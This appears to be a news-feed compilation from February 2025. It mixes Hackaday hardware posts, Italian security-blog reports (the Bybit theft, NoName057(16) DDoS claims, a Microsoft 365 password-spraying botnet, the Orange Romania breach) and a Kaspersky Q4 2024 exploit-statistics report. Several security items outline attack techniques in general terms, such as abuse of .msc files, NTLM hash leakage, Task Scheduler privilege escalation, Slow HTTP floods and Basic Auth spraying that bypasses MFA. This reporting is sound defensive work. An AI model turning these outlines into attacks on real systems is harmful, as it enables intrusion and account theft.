In this workshop, you will get the opportunity to design and manufacture your own design on an ASIC! You will learn the basics of digital logic, how semiconductors are designed and made, how to use an online digital design tool to build and simulate a simple design, and how to create the GDS files for manufacture on the open-source Sky130 PDK. Participants will have the option to submit their designs to be manufactured on the next shuttle as part of the Tiny Tapeout project.
Satisfying-Senseless-Sonic Add-On (SSSAO)
Want to build a cool noise-making device, leverage the I2C proto-petal badge add-on from your hackaday swag bag AND get to grips with low-cost open-hardware RISC-V microcontrollers? In this workshop we’ll do all three. It goes like this: solder a motor circuit to your proto petal, add your choice of a few sonically-resonating-items to be actuated by the motor, program the onboard microcontroller from one of our pre-configured laptops, then go join the badge-orchestra!
If you still don’t haven’t yet, go get your tickets to Hackaday Europe. We’ll be announcing a keynote speaker next week, and then we’ll see you all in Berlin!
Lazarus ruba 1,5 miliardi in crypto: Bybit offre 140 milioni per ritrovarli!
Gli esperti di sicurezza hanno collegato il gruppo di hacker nordcoreano Lazarus al furto di quasi 1,5 miliardi di dollari dall’exchange di criptovalute Bybit. Nel frattempo, la società ha annunciato una ricompensa pari al 10% dei fondi rubati (circa 140 milioni di dollari) per qualsiasi informazione che aiuterà a restituire i fondi rubati.
Il furto di 1,5 milardi di dollari in criptovaluta
Ricordiamo che alla fine della scorsa settimana, degli aggressori hanno rubato criptovalute per un valore di oltre 1,46 miliardi di dollari da Bybit, prelevando fondi dall’exchange. L’attacco è stato il più grande attacco hacker di criptovaluta della storia, più che raddoppiando il record precedente.
“Il 21 febbraio 2025, alle ore 12:30 UTC circa, Bybit ha rilevato un’attività non autorizzata in uno dei nostri cold wallet Ethereum (ETH) durante un normale processo di trasferimento. Il trasferimento faceva parte di uno spostamento pianificato di ETH dal nostro portafoglio multisig ETH verso un altro portafoglio” ha affermato Bybit in un rapporto sull’attacco . — Sfortunatamente, la transazione è stata manipolata utilizzando un attacco sofisticato che ha modificato la logica dello smart contract e l’interfaccia della firma, consentendo all’aggressore di ottenere il controllo del cold wallet ETH. Di conseguenza, più di 400.000 ETH e stETH per un valore di oltre 1,5 miliardi di dollari sono stati trasferiti a un indirizzo sconosciuto”.
È opportuno sottolineare che gli esperti di Check Point ritengono che gli aggressori abbiano identificato i responsabili dell’approvazione delle transazioni multisig e poi abbiano hackerato i loro dispositivi utilizzando malware, phishing o un attacco alla supply chain. Ricordiamo che Multisig è una funzionalità di sicurezza che richiede più chiavi per autorizzare una transazione di criptovalute. I portafogli Multi-Sig mirano a fornire una protezione migliorata, in particolare per le aziende o i gruppi che hanno bisogno di salvaguardare i loro asset digitali.
Il CEO di Bybit Ben Zhou ha dichiarato che Bybit è solvibile e sarà in grado di coprire tutte le perdite.
Il coinvolgimento degli hacker nord coreani di Lazarus
Poco dopo l’attacco, l’analista blockchain ZachXBT, che per primo ha scoperto l’incidente, ha riferito che probabilmente dietro l’attacco c’era il gruppo di hacker nordcoreano Lazarus.
Il fatto è che gli aggressori hanno inviato i fondi rubati da Bybit a un indirizzo Ethereum che era già apparso in precedenza negli attacchi a Phemex, BingX e Poloniex.
Il ricercatore ha inoltre affermato che Lazarus ricicla gli ETH rubati utilizzando il mixer eXch e trasferisce i fondi in Bitcoin tramite Chainflip. Le scoperte di ZachXBT sono confermate dagli esperti di TRM Labs , che scrivono anche che dietro l’attacco informatico a Bybit ci sono degli hacker nordcoreani.
Anche gli analisti blockchain di Elliptic attribuiscono questo attacco a Lazarus e notano che i fondi rubati sono già passati attraverso un gran numero di wallet e in questo modo gli hacker stanno cercando di nascondere la vera origine dei beni, rallentando i tentativi di rintracciarli.
“Un particolare exchanger, eXch, sembra aver consapevolmente riciclato decine di milioni di dollari in fondi rubati nonostante gli appelli di Bybit a fermarlo”, ha affermato Elliptic. — I fondi rubati vengono convertiti principalmente in bitcoin. Se i precedenti schemi di riciclaggio di denaro dovessero ripetersi questa volta, possiamo aspettarci che vengano utilizzati mixer di Bitcoin per coprirne le tracce.”
Riciclaggio internazionale e ricompensa per i fondi rubati
Allo stesso tempo, eXch nega tutte le accuse di riciclaggio intenzionale di fondi rubati a Bybit, affermando che “eXch non ricicla denaro per Lazarus e la Corea del Nord”. A quanto pare, solo una piccola parte dei fondi rubati da Bybit è stata ricevuta da eXch, si è trattato di un incidente isolato e la commissione derivante da questa operazione sarà devoluta in beneficenza.
Nel frattempo, i rappresentanti di Bybit hanno annunciato il lancio di un programma di ricompensa che dovrebbe aiutare a restituire i fondi rubati e a identificare gli hacker dietro questo attacco. Bybit ha promesso di pagare il 10% dei fondi recuperati (fino a 140 milioni di dollari) agli esperti di sicurezza che “svolgono un ruolo attivo nella restituzione delle criptovalute rubate”.
L'articolo Lazarus ruba 1,5 miliardi in crypto: Bybit offre 140 milioni per ritrovarli! proviene da il blog della sicurezza informatica.
New Camera Does Realtime Holographic Capture, No Coherent Light Required
Holography is about capturing 3D data from a scene, and being able to reconstruct that scene — preferably in high fidelity. Holography is not a new idea, but engaging in it is not exactly a point-and-shoot affair. One needs coherent light for a start, and it generally only gets touchier from there. But now researchers describe a new kind of holographic camera that can capture a scene better and faster than ever. How much better? The camera goes from scene capture to reconstructed output in under 30 milliseconds, and does it using plain old incoherent light.
The new camera is a two-part affair: acquisition, and calculation. Acquisition consists of a camera with a custom electrically-driven liquid lens design that captures a focal stack of a scene within 15 ms. The back end is a deep learning neural network system (FS-Net) which accepts the camera data and computes a high-fidelity RGB hologram of the scene in about 13 ms. How good are the results? They beat other methods, and reconstruction of the scene using the data looks really, really good.
One might wonder what makes this different from, say, a 3D scene captured by a stereoscopic camera, or with an RGB depth camera (like the now-discontinued Intel RealSense). Those methods capture 2D imagery from a single perspective, combined with depth data to give an understanding of a scene’s physical layout.
Holography by contrast captures a scene’s wavefront information, which is to say it captures not just where light is coming from, but how it bends and interferes. This information can be used to optically reconstruct a scene in a way data from other sources cannot; for example allowing one to shift perspective and focus.
Being able to capture holographic data in such a way significantly lowers the bar for development and experimentation in holography — something that’s traditionally been tricky to pull off for the home gamer.
hackaday.com/2025/02/26/new-ca…
Exploits and vulnerabilities in Q4 2024
Q4 2024 saw fewer published exploits for Windows and Linux compared to the first three quarters. Although the number of registered vulnerabilities continued to rise, the total number of Proof of Concept (PoC) instances decreased compared to 2023. Among notable techniques in Q4, attackers leveraged undocumented RPC interfaces and targeted the Windows authentication mechanism.
Statistics on registered vulnerabilities
This section contains statistics on registered vulnerabilities. Data is sourced from the CVE portal: cve.org.
Total number of registered vulnerabilities and number of critical ones, Q4 2023 vs. Q4 2024 (download)
In Q4 2024, the trend of documenting software flaws that create vulnerabilities continued to gain momentum. The share of vulnerabilities labeled as critical was slightly higher than in Q4 2023. In general, more and more vulnerabilities are being assigned CVE identifiers through Bug Bounty programs and general software security research. Let’s also examine the number of public exploits.
Number of vulnerabilities, the share of critical ones, and those for which exploits exist, 2019–2024 (download)
As shown in the graph, the number of published exploits for vulnerabilities ended up at around 6%, which is 4 p.p. lower than in 2023. This decline may be due to vendors’ requirements not to disclose information about exploitation methods for discovered vulnerabilities and corresponding exploits—we believe researchers are increasingly encountering such requests. Thus, the main trends of 2024 were the growth in the number of registered vulnerabilities, the decrease in the number of PoCs, and the share of critical vulnerabilities remaining at 2023 levels.
Let’s examine the most popular types of vulnerabilities exploited in real attacks in 2023 and 2024.
Number of vulnerabilities by the most prevalent CWEs used in attacks on users in 2023 (download)
Number of vulnerabilities by the most prevalent CWEs used in attacks on users in 2024 (download)
As in 2023, the top three in the list are the following software issues:
- CWE-78—Improper or insufficient neutralization of command-line inputs (OS Command Injection);
- CWE-20—Improper input filtering and validation. This includes most vulnerabilities that allow attackers to take control of applications;
- CWE-787—Memory corruption vulnerabilities (Out-of-bounds Write).
These types of flaws have been known for a long time and remain actively exploited by attackers. The number of associated vulnerabilities has remained at the same level over the past two years.
Next are software flaws that are less common but no less critical. In 2024, some of the most popular CWEs included the following:
- CWE-416—Improper use of dynamic memory resources (Use After Free);
- CWE-22—Improper handling of file system path formats (Path Traversal);
- CWE-94—Improper control of code generation (Code Injection);
- CWE-502—Deserialization of untrusted data;
- CWE-843—Improper handling of data types (Type Confusion);
- CWE-79—Improper neutralization of input during web page generation (Cross-site Scripting);
- CWE-122—Heap-based Buffer Overflow.
Compared to 2023, CWE-119—associated with performing operations outside buffer bounds—was the only one to drop out of the TOP 10. However, it was replaced by a similar type, CWE-122, associated with buffer overflow—so memory corruption vulnerabilities remained on the list. This confirms that the landscape of software flaws leading to exploitable vulnerabilities has remained unchanged over the past two years.
Exploitation statistics
This section contains statistics on the use of exploits in Q4 2024. The data is based on open sources and our telemetry.
Windows and Linux vulnerability exploitation
Among the exploits detected by Kaspersky solutions for Windows, the most popular throughout 2024, including Q4, were vulnerabilities in Microsoft Office applications:
- CVE-2018-0802—Remote code execution vulnerability in the Equation Editor component;
- CVE-2017-11882—Another remote code execution vulnerability also affecting the Equation Editor;
- CVE-2017-0199—A vulnerability in Microsoft Office and WordPad that allows an attacker to take control of the system.
Following these, the most common vulnerabilities in Q4 included those in WinRAR and various Windows subsystems:
- CVE-2023-38831—A vulnerability in WinRAR related to improper handling of objects contained in an archive;
- CVE-2024-38100—A vulnerability known as Leaked Wallpaper, which allows an attacker to obtain a NetNTLM hash used in user authentication protocols;
- CVE-2024-21447—A vulnerability in improper link handling within the file system. It resides in the UserManager service and, if exploited, allows privilege escalation;
- CVE-2024-28916—A vulnerability similar to CVE-2024-21447 in the Xbox Gaming Service.
Each of the above vulnerabilities can be used to compromise the system and gain the highest possible privileges, so we recommend regularly updating the corresponding software.
Dynamics of the number of Windows users encountering exploits, Q1 2023—Q4 2024. The number of users who encountered exploits in Q1 2023 is taken as 100% (download)
Kaspersky products for the Linux operating system triggered on exploits for the following vulnerabilities:
- CVE-2024-1086—Improper resource handling vulnerability in the nf_tables component of the kernel. Exploiting it allows privilege escalation in the system;
- CVE-2024-0582—A memory leak vulnerability in the io_uring component, which can be used to escalate privileges on the vulnerable system;
- CVE-2022-0847—A widespread vulnerability known as Dirty Pipe, allowing privilege escalation and control over running applications;
- CVE-2022-34918—Improper handling of kernel objects related to the netfilter component. Exploiting the vulnerability allows privilege escalation in the system.
Dynamics of the number of Linux users encountering exploits, Q1 2023—Q4 2024. The number of users who encountered exploits in Q1 2023 is taken as 100% (download)
For the Linux operating system, it is critically important to keep kernel components up to date, as well as any software used.
Most common published exploits
The distribution of published exploits for vulnerabilities by platform, Q3 2024 (download)
The distribution of published exploits for vulnerabilities by platform, Q4 2024 (download)
In Q4 2024, operating systems remained the most popular category of software in terms of the number of publicly available working exploits. At the same time, the share of exploits targeting Microsoft Office tools decreased, and no exploits for SharePoint vulnerabilities were published.
The distribution of published exploits for vulnerabilities by platform, 2024 (download)
Data for 2024 shows that the overall trend of attacks on operating systems continues to grow, increasingly displacing other categories of software. Researchers and attackers are finding new operating system components that still contain potentially exploitable vulnerabilities.
Vulnerability exploitation in APT attacks
We analyzed which vulnerabilities were most commonly used in APT attacks in Q4 2024. The ranking below is based on our telemetry, research, and open sources.
TOP 10 vulnerabilities exploited in APT attacks, Q4 2024 (download)
The list of vulnerabilities commonly used in APT attacks shows changes in the software exploited by attackers. Microsoft Office applications, whose vulnerabilities were not used as much in 2023, have returned to the top ten most frequently exploited types of software. In addition, vulnerabilities for PAN-OS appeared on the list for the first time. Moreover, remote access systems and corporate data processing solutions once again appeared among the vulnerable applications. These statistics highlight the issue of delayed patch installation, which attackers quickly exploit. We strongly recommend promptly updating the software listed.
Interesting vulnerabilities
This section contains the most interesting vulnerabilities published in Q4 2024.
CVE-2024-43572—Remote code execution vulnerability in Microsoft Management Console
The Windows operating system has many useful features and mechanisms that allow users to customize it for their convenience. One such feature is the Microsoft Management Console (MMC)—an interface for running applications that contain strictly structured information. These applications are called “snap-ins.” The operating system provides a number of built-in tools for working with MMC, such as
services.msc—an interface for managing services. This is an XML file that interacts with individual COM objects and allows you to set parameters for them in the management console.
According to Microsoft documentation, .msc files can be used for system administration. Attackers exploited this functionality to run commands on user systems: inside the .msc file, they specified the URI
urn:schemas-microsoft-com:xslt and commands in JavaScript and VBScript. These files were distributed as email attachments.
Header of the main .msc file
CVE-2024-43451—NetNTLM hash disclosure vulnerability
This vulnerability is also related to the functionality of the Windows operating system, specifically to the NTLM authentication mechanism with the SSPI interface, which is automatically launched in all versions of the OS up to and including Windows 10. During the transmission of the NetNTLM hash, an attacker can intercept it or redirect it to another service, resulting in the compromise of the victim’s credentials. In common legitimate Windows scenarios, users frequently need to authenticate using the NTLM protocol, which may attract attackers. In 2024, we observed the active use of files of various formats with the .url extension in attacks: these files contained links to resources that triggered authentication using NTLM mechanisms.
CVE-2024-49039—Elevation of privilege vulnerability in Windows Task Scheduler
Our 2024 reports mainly included vulnerabilities that were used either solely for privilege escalation or for initial system access. However, CVE-2024-49039 stands out because it allows stealthy persistence within the system, privilege escalation, and command execution.
This vulnerability exploits an undocumented RPC endpoint on the server side, which contains interfaces with a misconfigured security descriptor, enabling privilege escalation.
In recent versions of Windows, when a scheduled task is registered, applications can run in AppContainer, which generally limits their privileges. To exploit the vulnerability, an attacker needs to create a scheduled task that, upon execution, calls the undocumented RPC endpoint. The Task Scheduler contains a vulnerable application launch algorithm, and as a result of the RPC call, the application will be relaunched without AppContainer with the privileges of a regular or system user.
Conclusion and advice
The total number of vulnerabilities registered in the Q4 2024 continues to grow compared to 2023, but the number of published exploits decreased. This may be due to the fact that software vendors have not yet released patches because of the traditional lull during the holiday period. Notably, attackers continue to invent new methods of privilege escalation, as seen in the Task Scheduler vulnerability.
To stay safe, it is essential to respond promptly to the evolving threat landscape. Also, make sure that you:
- Ensure round-the-clock monitoring of your infrastructure, paying special attention to the perimeter;
- Maintain a patch management process: promptly apply security fixes. To configure and automate vulnerability and patch management, you can use solutions like Vulnerability Assessment and Patch Management and Kaspersky Vulnerability Data Feed;
- Use reliable solutions that can detect and block malware on corporate devices, and comprehensive tools that include incident response scenarios and up-to-date cyberthreat databases.
securelist.com/vulnerabilities…
Dieci Giorni di DDoS! NoName057(16) colpisce il Comune di Milano e la Regione Abruzzo
Gli hacker di NoName057(16) continuano anche oggi le loro attività ostili contro diversi obiettivi italiani, attraverso attacchi di Distributed Denial-of-Service (DDoS).
A farne le spese oggi sono il Comune di Milano, il Consiglio regionale della Valle d’Aosta, la Regione Abruzzo, la Regione Basilicata e il Comune di potenza. Questo è quanto gli hacktivisti hanno scritto poco fa sul loro canale Telegram.
Inviati Missili DDoS ai siti web di regioni e comuni italiani
❌Progetti e iniziative del Comune di Milano
check-host.net/check-report/236fc2d7k54f
❌Consiglio regionale della Valle d'Aosta
check-host.net/check-report/236fc31ck4a0
Regione Abruzzo
check-host.net/check-report/236fea4bkda1
Regione Basilicata
check-host.net/check-report/236fc35ek38e
❌Comune di Potenza
check-host.net/check-report/236fc633k712
Tradotto con DeepL.com (versione gratuita)
NoName057(16) è un gruppo di hacker che si è dichiarato a marzo del 2022 a supporto della Federazione Russa. Hanno rivendicato la responsabilità di attacchi informatici a paesi come l’Ucraina, gli Stati Uniti e altri vari paesi europei. Questi attacchi vengono in genere eseguiti su agenzie governative, media e siti Web di società private
Che cos’è un attacco Distributed Denial of Service
Un attacco DDoS (Distributed Denial of Service) è un tipo di attacco informatico in cui vengono inviate una grande quantità di richieste a un server o a un sito web da molte macchine diverse contemporaneamente, al fine di sovraccaricare le risorse del server e renderlo inaccessibile ai suoi utenti legittimi.
Queste richieste possono essere inviate da un grande numero di dispositivi infetti da malware e controllati da un’organizzazione criminale, da una rete di computer compromessi chiamata botnet, o da altre fonti di traffico non legittime. L’obiettivo di un attacco DDoS è spesso quello di interrompere le attività online di un’organizzazione o di un’azienda, o di costringerla a pagare un riscatto per ripristinare l’accesso ai propri servizi online.
Gli attacchi DDoS possono causare danni significativi alle attività online di un’organizzazione, inclusi tempi di inattività prolungati, perdita di dati e danni reputazionali. Per proteggersi da questi attacchi, le organizzazioni possono adottare misure di sicurezza come la limitazione del traffico di rete proveniente da fonti sospette, l’utilizzo di servizi di protezione contro gli attacchi DDoS o la progettazione di sistemi resistenti agli attacchi DDoS.
Occorre precisare che gli attacchi di tipo DDoS, seppur provocano un disservizio temporaneo ai sistemi, non hanno impatti sulla Riservatezza e Integrità dei dati, ma solo sulla loro disponibilità. pertanto una volta concluso l’attacco DDoS, il sito riprende a funzionare esattamente come prima.
Che cos’è l’hacktivismo cibernetico
L’hacktivismo cibernetico è un movimento che si serve delle tecniche di hacking informatico per promuovere un messaggio politico o sociale. Gli hacktivisti usano le loro abilità informatiche per svolgere azioni online come l’accesso non autorizzato a siti web o a reti informatiche, la diffusione di informazioni riservate o il blocco dei servizi online di una determinata organizzazione.
L’obiettivo dell’hacktivismo cibernetico è di sensibilizzare l’opinione pubblica su questioni importanti come la libertà di espressione, la privacy, la libertà di accesso all’informazione o la lotta contro la censura online. Gli hacktivisti possono appartenere a gruppi organizzati o agire individualmente, ma in entrambi i casi utilizzano le loro competenze informatiche per creare un impatto sociale e politico.
È importante sottolineare che l’hacktivismo cibernetico non deve essere confuso con il cybercrime, ovvero la pratica di utilizzare le tecniche di hacking per scopi illeciti come il furto di dati personali o finanziari. Mentre il cybercrime è illegale, l’hacktivismo cibernetico può essere considerato legittimo se mira a portare all’attenzione pubblica questioni importanti e a favorire il dibattito democratico. Tuttavia, le azioni degli hacktivisti possono avere conseguenze legali e gli hacktivisti possono essere perseguiti per le loro azioni.
Chi sono gli hacktivisti di NoName057(16)
NoName057(16) è un gruppo di hacker che si è dichiarato a marzo del 2022 a supporto della Federazione Russa. Hanno rivendicato la responsabilità di attacchi informatici a paesi come l’Ucraina, gli Stati Uniti e altri vari paesi europei. Questi attacchi vengono in genere eseguiti su agenzie governative, media e siti Web di società private
Le informazioni sugli attacchi effettuati da NoName057(16) sono pubblicate nell’omonimo canale di messaggistica di Telegram. Secondo i media ucraini, il gruppo è anche coinvolto nell’invio di lettere di minaccia ai giornalisti ucraini. Gli hacker hanno guadagnato la loro popolarità durante una serie di massicci attacchi DDOS sui siti web lituani.
Le tecniche di attacco DDoS utilizzate dal gruppo sono miste, prediligendo la “Slow http attack”.
La tecnica del “Slow Http Attack”
L’attacco “Slow HTTP Attack” (l’articolo completo a questo link) è un tipo di attacco informatico che sfrutta una vulnerabilità dei server web. In questo tipo di attacco, l’attaccante invia molte richieste HTTP incomplete al server bersaglio, con lo scopo di tenere occupate le connessioni al server per un periodo prolungato e impedire l’accesso ai legittimi utenti del sito.
Nello specifico, l’attacco Slow HTTP sfrutta la modalità di funzionamento del protocollo HTTP, che prevede che una richiesta HTTP sia composta da tre parti: la richiesta, la risposta e il corpo del messaggio. L’attaccante invia molte richieste HTTP incomplete, in cui il corpo del messaggio viene inviato in modo molto lento o in modo incompleto, bloccando la connessione e impedendo al server di liberare le risorse necessarie per servire altre richieste.
Questo tipo di attacco è particolarmente difficile da rilevare e mitigare, poiché le richieste sembrano legittime, ma richiedono un tempo eccessivo per essere elaborate dal server. Gli attacchi Slow HTTP possono causare tempi di risposta molto lenti o tempi di inattività del server, rendendo impossibile l’accesso ai servizi online ospitati su quel sistema.
Per proteggersi da questi attacchi, le organizzazioni possono implementare soluzioni di sicurezza come l’uso di firewall applicativi (web application firewall o WAF), la limitazione delle connessioni al server e l’utilizzo di sistemi di rilevamento e mitigazione degli attacchi DDoS
L'articolo Dieci Giorni di DDoS! NoName057(16) colpisce il Comune di Milano e la Regione Abruzzo proviene da il blog della sicurezza informatica.
Microsoft 365 Sotto Attacco! Spraying Password sui sistemi legacy da Una Botnet di 130.000 Dispositivi
Specialisti di SecurityScorecard loro segnalano , un’enorme botnet composta da oltre 130.000 dispositivi compromessi sta conducendo attacchi di password spraying sugli account Microsoft 365 in tutto il mondo. L’attacco prende di mira il meccanismo di autenticazione legacy Basic Authentication (Basic Auth), consentendo agli aggressori di aggirare l’autenticazione a più fattori (MFA).
I criminali informatici utilizzano credenziali rubate tramite un keylogger. L’attacco viene eseguito tramite tentativi di accesso non interattivi tramite Basic Auth, che consente agli aggressori di eludere il sistema di sicurezza.
Gli esperti avvertono che le organizzazioni che si affidano esclusivamente al monitoraggio degli accessi interattivi restano vulnerabili. L’accesso non interattivo, spesso utilizzato per connessioni di servizi e protocolli legacy (ad esempio POP, IMAP, SMTP), nella maggior parte dei casi non richiede la conferma MFA. Nonostante Microsoft abbia gradualmente eliminato Basic Auth, il metodo è ancora abilitato in alcuni ambienti aziendali, il che lo rende un bersaglio interessante per gli attacchi.
Basic Auth viene utilizzato per attaccare con forza bruta gli account con password comunemente utilizzate (o trapelate). Se la password viene selezionata correttamente, l’MFA non viene attivato, il che consente agli hacker criminali di accedere al tuo account senza ulteriori conferme. Questo stesso meccanismo consente di aggirare i criteri di accesso condizionale, rendendo l’attacco praticamente invisibile.
Le credenziali compromesse possono consentire agli aggressori di accedere a servizi legacy che non supportano MFA o di utilizzare i dati per ulteriori attacchi di phishing allo scopo di impossessarsi completamente degli account. I segnali degli attacchi possono essere trovati nei log degli ID Entra. Tra i segnali rientrano un aumento dei tentativi di accesso non interattivi, molteplici tentativi di autorizzazione non riusciti da diversi indirizzi IP e la presenza dell’agente “fasthttp” nei log.
I ricercatori ipotizzano che la botnet possa essere collegata a gruppi provenienti dalla Cina, anche se non ci sono ancora informazioni definitive. L’attacco è scalabile distribuendo i tentativi di accesso su un numero enorme di indirizzi IP, rendendo la botnet difficile da rilevare e bloccare.
La botnet è controllata tramite 6 server C2 situati nell’infrastruttura del provider americano Shark Tech e il traffico passa attraverso gli hosting UCLOUD HK (Hong Kong) e CDS Global Cloud (Cina). I server C2 sono basati su Apache Zookeeper e Kafka e il fuso orario del sistema è impostato su Asia/Shanghai. I registri di uptime mostrano che la botnet è attiva da dicembre 2024.
L'articolo Microsoft 365 Sotto Attacco! Spraying Password sui sistemi legacy da Una Botnet di 130.000 Dispositivi proviene da il blog della sicurezza informatica.
Orange Group colpita dal Threat Actors Rey : dati sensibili di clienti e dipendenti esposti
Il settore delle telecomunicazioni è sempre più nel mirino dei cybercriminali, e l’ultimo attacco subito da Orange Group, uno dei principali operatori francesi, lo dimostra. Un hacker, noto come Rey, ha dichiarato di aver violato i sistemi dell’azienda, sottraendo migliaia di documenti contenenti dati di clienti e dipendenti.
L’attacco ha avuto conseguenze significative, con la pubblicazione online di informazioni sensibili dopo il rifiuto dell’azienda di pagare un riscatto. Orange ha confermato la violazione, dichiarando che ha riguardato una applicazione non critica, ma il volume dei dati esfiltrati solleva interrogativi sulla sicurezza informatica nel settore delle telecomunicazioni.
Attacco mirato ad un colosso delle telecomunicazioni
Orange Group è un attore chiave nel settore delle telecomunicazioni e dei servizi digitali, con una presenza globale che comprende oltre 280 milioni di clienti. Il gruppo opera in numerosi paesi e offre servizi di telefonia fissa, mobile, internet a banda larga e soluzioni aziendali, oltre a essere coinvolto nello sviluppo di infrastrutture digitali e nell’innovazione tecnologica.
Questa posizione di rilievo lo rende un obiettivo particolarmente appetibile per i criminali informatici, dato il valore dei dati trattati: informazioni personali, contratti, credenziali di accesso e persino dati finanziari. L’attacco subito da Orange Romania, una delle divisioni più importanti del gruppo, dimostra come gli hacker prendano di mira nodi strategici delle infrastrutture aziendali.
Telecomunicazioni nel mirino: perché le aziende del settore sono bersagli strategici?
Le aziende di telecomunicazioni gestiscono enormi quantità di dati sensibili, inclusi i dettagli delle comunicazioni dei clienti, informazioni di fatturazione e credenziali di accesso ai servizi. Questi dati rappresentano una risorsa preziosa per i cybercriminali, che possono sfruttarli per:
- Attacchi di phishing e frodi finanziarie, utilizzando gli indirizzi email e i dati personali sottratti
- Accesso non autorizzato ai sistemi aziendali, se le credenziali compromesse non vengono aggiornate
- Spionaggio industriale e vendita di dati a terze parti
Inoltre, un attacco a un operatore di telecomunicazioni può avere conseguenze su milioni di utenti, mettendo a rischio la loro privacy e la sicurezza delle loro comunicazioni.
Attualmente, non possiamo confermare l’autenticità della notizia, poiché l’organizzazione non ha ancora pubblicato un comunicato ufficiale sul proprio sito web in merito all’incidente. Le informazioni riportate provengono da fonti pubbliche accessibili su siti underground, pertanto vanno interpretate come una fonte di intelligence e non come una conferma definitiva.
Secondo quanto riportato dallo stesso hacker su un noto forum del dark web, Orange Group sarebbe stata contattata per il pagamento di un riscatto, ma la società avrebbe rifiutato di negoziare. A seguito di questo rifiuto, Rey ha deciso di rendere pubblici i dati sottratti, pubblicando un annuncio corredato di link per il download.
L’attacco è stato confermato da Orange, che ha dichiarato che la violazione ha coinvolto una applicazione non critica. Tuttavia, la quantità e la natura dei dati compromessi destano preoccupazioni.
Oltre 600.000 record esposti
Rey sostiene di aver avuto accesso ai sistemi di Orange per oltre un mese prima di avviare l’estrazione dei dati, operazione che sarebbe durata circa tre ore senza essere rilevata. Secondo l’hacker, il breach include:
- 380.000 email uniche appartenenti a clienti, ex dipendenti, partner e collaboratori di Orange Romania
- Dati di clienti e dipendenti, inclusi dettagli personali e contrattuali
- Codici sorgente di software interni
- Documenti riservati, come fatture, contratti e piani progettuali
- Informazioni parziali sulle carte di pagamento di alcuni clienti rumeni
- Nomi e indirizzi email degli utenti del servizio Yoxo, l’abbonamento senza vincoli di Orange
L’hacker ha dichiarato di aver sfruttato una combinazione di credenziali compromesse e vulnerabilità nei sistemi di Orange, in particolare all’interno di Jira, un software utilizzato dall’azienda per la gestione di bug e ticket interni.
Rey ha inoltre precisato che l’attacco non è stato eseguito nell’ambito di un’operazione ransomware del gruppo HellCat, di cui fa parte, ma come azione indipendente.
L’intrusione ha permesso all’hacker di infiltrarsi nei sistemi della compagnia senza essere rilevato e di esfiltrare un totale di circa 6,92GB di dati distribuiti su 12.000 file.
La risposta di Orange e le implicazioni sulla sicurezza
Orange Group ha confermato la violazione e ha dichiarato di aver avviato un’indagine interna per valutare l’entità dell’incidente e mitigare i danni.
“Abbiamo preso immediatamente provvedimenti e la nostra priorità rimane proteggere i dati e gli interessi di dipendenti, clienti e partner. L’attacco ha colpito un’applicazione di back-office non critica e non ha avuto impatti sui servizi rivolti ai clienti”, ha dichiarato un portavoce dell’azienda.
Il caso solleva però gravi preoccupazioni sulla sicurezza informatica. L’uso di credenziali compromesse e falle in software interni dimostra la necessità per le aziende di implementare autenticazione multi-fattore per ridurre il rischio di accesso non autorizzato ed effettuare controlli di sicurezza regolari per individuare e correggere vulnerabilità.
Orange non ha ancora chiarito se informerà i clienti e i dipendenti coinvolti nella violazione, ma è bene a chiunque potrebbe essere potenzialmente interessato di fare attenzione a possibili tentativi di phishing o frodi.
Conclusioni: un segnale di allarme per l’intero settore
La violazione subita da Orange Group è solo l’ennesimo esempio di attacchi informatici rivolti ad aziende di telecomunicazioni. La capacità degli hacker di rimanere nei sistemi aziendali per settimane senza essere scoperti dimostra l’urgenza di strategie di difesa più avanzate.
Questo episodio dimostra l’importanza di adottare strategie di cybersecurity proattive, migliorando la protezione delle credenziali, rafforzando i controlli di sicurezza e investendo in soluzioni per la rilevazione tempestiva delle minacce.
Mentre Orange lavora per contenere i danni e proteggere i propri clienti, la violazione rappresenta un chiaro monito per tutte le aziende del settore: nel mondo digitale di oggi, la sicurezza informatica non è più un’opzione, ma una necessità fondamentale.
RHC monitorerà l’evoluzione della vicenda in modo da pubblicare ulteriori news sul blog, qualora ci fossero novità sostanziali. Qualora ci siano persone informate sui fatti che volessero fornire informazioni in modo anonimo possono utilizzare la mail crittografata del whistleblower.
L'articolo Orange Group colpita dal Threat Actors Rey : dati sensibili di clienti e dipendenti esposti proviene da il blog della sicurezza informatica.
Import GPU: Python Programming with CUDA
Every few years or so, a development in computing results in a sea change and a need for specialized workers to take advantage of the new technology. Whether that’s COBOL in the 60s and 70s, HTML in the 90s, or SQL in the past decade or so, there’s always something new to learn in the computing world. The introduction of graphics processing units (GPUs) for general-purpose computing is perhaps the most important recent development for computing, and if you want to develop some new Python skills to take advantage of the modern technology take a look at this introduction to CUDA which allows developers to use Nvidia GPUs for general-purpose computing.
Of course CUDA is a proprietary platform and requires one of Nvidia’s supported graphics cards to run, but assuming that barrier to entry is met it’s not too much more effort to use it for non-graphics tasks. The guide takes a closer look at the open-source library PyTorch which allows a Python developer to quickly get up-to-speed with the features of CUDA that make it so appealing to researchers and developers in artificial intelligence, machine learning, big data, and other frontiers in computer science. The guide describes how threads are created, how they travel along within the GPU and work together with other threads, how memory can be managed both on the CPU and GPU, creating CUDA kernels, and managing everything else involved largely through the lens of Python.
Getting started with something like this is almost a requirement to stay relevant in the fast-paced realm of computer science, as machine learning has taken center stage with almost everything related to computers these days. It’s worth noting that strictly speaking, an Nvidia GPU is not required for GPU programming like this; AMD has a GPU computing platform called ROCm but despite it being open-source is still behind Nvidia in adoption rates and arguably in performance as well. Some other learning tools for GPU programming we’ve seen in the past include this puzzle-based tool which illustrates some of the specific problems GPUs excel at.
Taking Cues From a Gramophone To Make a Better Marble Music Machine
[Martin] of [Wintergatan] is on a quest to create the ultimate human-powered, modern marble music machine. His fearless mechanical exploration and engineering work, combined with considerable musical talent, has been an ongoing delight as he continually refines his designs. We’d like to highlight this older video in which he demonstrates how to dynamically regulate the speed of a human-cranked music machine by taking inspiration from gramophones: he uses a flyball governor (or centrifugal governor).
These devices are a type of mechanical feedback system that was invented back in the 17th century but really took off once applied to steam engines. Here’s how they work: weights are connected to a shaft with a hinged assembly. The faster the shaft spins, the more the weights move outward due to centrifugal force. This movement is used to trigger some regulatory action, creating a feedback loop. In a steam engine, the regulator adjusts a valve which keeps the engine within a certain speed range. In a gramophone it works a wee bit differently, and this is the system [Wintergatan] uses.
To help keep the speed of his music machine within a certain narrow range, instead of turning a valve the flyball governor moves a large disk brake. The faster the shaft spins, the harder the brake is applied. Watch it in action in the video (embedded below) which shows [Wintergatan]’s prototype, demonstrating how effective it is.
